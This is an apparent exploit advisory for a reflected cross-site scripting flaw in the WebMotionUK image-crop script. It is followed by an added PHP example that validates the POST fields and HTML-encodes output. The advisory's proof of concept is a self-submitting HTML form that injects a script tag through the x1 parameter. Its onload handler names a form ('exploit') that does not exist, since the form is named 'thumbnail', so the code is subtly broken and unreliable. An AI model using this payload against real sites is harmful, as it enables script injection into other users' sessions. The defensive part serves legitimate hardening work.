# Exploit Title: WebMotionUK CMS Reflected Cross-Site Scripting (XSS) Vulnerability
# Date: July 25, 2017
# Author: Ashiyane Digital Security Team
# Vendor Homepage : http://www.webmotionuk.com/
# Download Link : http://www.webmotionuk.com/php-jquery-image-upload-and-crop/
# Version : Ver 1.2 & Ver 1.0
# CWE : 79
# Category: Web Application
# Tested On : Windows 10 / Chrome
______________________
Vulnerable File:
upload_crop.php
______________________
Vulnerable Method and Variables:
POST / x1, x2, y1, y2, w, idp and file_extp
______________________
Vulnerable Path:
http://localhost/[PATH]/upload_crop.php
______________________
Vulnerability code and Exploit:
<html>
<body onload="document.exploit.submit()">
<form name="thumbnail" action="http://localhost/[PATH]/upload_crop.php"
method="post">
<input type="hidden" name="x1" value="'/><script>alert(1)</script>"
id="x1" />
<input type="hidden" name="y1" value="" id="y1" />
<input type="hidden" name="x2" value="" id="x2" />
<input type="hidden" name="y2" value="" id="y2" />
<h2>Ancho</h2>
<input type="text" name="w" value="" id="w" /><br />
<h2>Ancho</h2>
<input type="text" name="h" value="" id="h" /><br />
<input type='hidden' name='idp' value=''/>
<input type='hidden' name='file_extp' value=''/><br />
</form>
</body>
</html>
______________________
HackFanS
__________
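Added example (not part of the original advisory and not WebMotionUK code): one way to handle the POST fields listed above on the server side, by validating each field against its expected type and encoding anything written back into HTML. It assumes the crop coordinates are integers and that upload_crop.php echoes them into quoted attributes; the function names, numeric limits and extension allow-list are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: names, limits and the allow-list below are assumptions.
const CROP_INT_FIELDS = ['x1', 'y1', 'x2', 'y2', 'w'];
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

/** Encode a value for HTML output; ENT_QUOTES also encodes the single quote. */
function attr(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return the validated fields, or null when any field has an unexpected form. */
function validate_crop_post(array $post): ?array
{
    $clean = [];
    foreach (CROP_INT_FIELDS as $f) {
        $v = filter_var($post[$f] ?? null, FILTER_VALIDATE_INT,
            ['options' => ['min_range' => 0, 'max_range' => 10000]]);
        if ($v === false) {
            return null;
        }
        $clean[$f] = $v;
    }
    $idp = $post['idp'] ?? null;
    if (!is_string($idp) || preg_match('/\A\d{1,10}\z/', $idp) !== 1) {
        return null;
    }
    $ext = $post['file_extp'] ?? null;
    if (!is_string($ext) || !in_array(strtolower($ext), ALLOWED_EXT, true)) {
        return null;
    }
    return $clean + ['idp' => $idp, 'file_extp' => strtolower($ext)];
}

// Constructed sample input: x1 carries the value from the form in this advisory.
$hostile = ['x1' => "'/><script>alert(1)</script>", 'y1' => '0', 'x2' => '100',
            'y2' => '100', 'w' => '100', 'idp' => '7', 'file_extp' => 'jpg'];
$benign = ['x1' => '10'] + $hostile;

var_dump(validate_crop_post($hostile)); // request is refused before any output
var_dump(validate_crop_post($benign));  // typed values, safe to use
// Defence in depth: even an unvalidated value stays inert once encoded.
echo "<input type='hidden' name='x1' value='", attr($hostile['x1']), "' />\n";
```

Validation alone is not the fix for CWE-79; the output encoding in attr() is what keeps a reflected value from closing the attribute, and ENT_QUOTES matters because the value in this advisory begins with a single quote.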